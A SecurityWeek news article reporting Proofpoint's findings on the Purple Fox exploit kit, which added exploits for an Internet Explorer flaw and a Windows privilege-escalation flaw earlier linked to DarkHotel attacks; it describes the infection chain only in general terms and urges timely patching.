Security Experts:

Connect with us

Hi, what are you looking for?



Purple Fox Exploit Kit Targets Vulnerabilities Linked to DarkHotel Group

The developers of the Purple Fox exploit kit (EK) have added two new exploits to their arsenal, including one for a vulnerability addressed in February this year.

The developers of the Purple Fox exploit kit (EK) have added two new exploits to their arsenal, including one for a vulnerability addressed in February this year.

Initially detailed in September 2018, the EK was designed for the distribution of the Purple Fox Trojan/Rootkit. Previously, the Trojan was being disseminated through the RIG EK, but its operators were likely looking into cutting down costs, Proofpoint’s security researchers note.

In recent distribution campaigns, the Purple Fox EK has been leveraging exploits targeting CVE-2020-0674 (a scripting engine memory corruption in Internet Explorer) and CVE-2019-1458 (a local privilege elevation in Windows), two vulnerabilities that Microsoft addressed in February 2020 and December 2019, respectively.

Before patches were released for these security bugs, however, both were observed being abused in attacks associated with the DarkHotel threat group, which is believed to be linked to the South Korean government. Last year, the threat actor also targeted a Chrome zero-day as part of Operation WizardOpium.

Purple Fox is believed to have affected tens of thousands of users, initially dropping crypto-miners onto compromised machines. Over time, however, it received several improvements, such as the addition of rootkit code and the recently added exploits.

Analysis of the infection chain has revealed the use of a script that first checks the operating system on the target machine to select the method for executing the next stage payload (via msiexec.exe).

It would also attempt to elevate privileges using exploits for the CVE-2018-8120 and CVE-2015-1701 vulnerabilities impacting the Win32k multiuser driver. Recent versions of the script also include an exploit for CVE-2019-1458, Proofpoint reveals.

Although not as prevalent as they used to be, exploit kits continue to be present on the threat landscape and they are also regularly updated with exploits for more recent vulnerabilities, to improve efficiency, something that Purple Fox EK developers are attempting as well.

The exploits added to the EK’s arsenal, however, target vulnerabilities that have been addressed via security updates months ago, which underlines the importance of patching computers in a timely manner.

“The fact that the authors of the Purple Fox malware have stopped using the RIG EK and moved to build their own EK to distribute their malware reminds us that malware is a business. In essence, the authors behind the Purple Fox malware decided to bring development ‘in-house’ to reduce costs, just like many legitimate businesses do. Bringing the distribution mechanism ‘in-house’ also enables greater control over what the EK actually loads,” Proofpoint also notes.

Related: Microsoft Patches IE Zero-Day, 98 Other Vulnerabilities

Related: Microsoft Patches Windows Zero-Day Exploited in Korea-Linked Attacks

Related: New ‘Lord’ Exploit Kit Emerges

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Expert Insights

Related Content


Zendesk is informing customers about a data breach that started with an SMS phishing campaign targeting the company’s employees.


The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.


The FBI dismantled the network of the prolific Hive ransomware gang and seized infrastructure in Los Angeles that was used for the operation.

Malware & Threats

Microsoft plans to improve the protection of Office users by blocking XLL add-ins from the internet.

Cloud Security

VMware vRealize Log Insight vulnerability allows an unauthenticated attacker to take full control of a target system.

IoT Security

Lexmark warns of a remote code execution (RCE) vulnerability impacting over 120 printer models, for which PoC code has been published.


A new study by McAfee and the Center for Strategic and International Studies (CSIS) named a staggering figure as the true annual cost of...

Mobile & Wireless

Apple rolled out iOS 16.3 and macOS Ventura 13.2 to cover serious security vulnerabilities.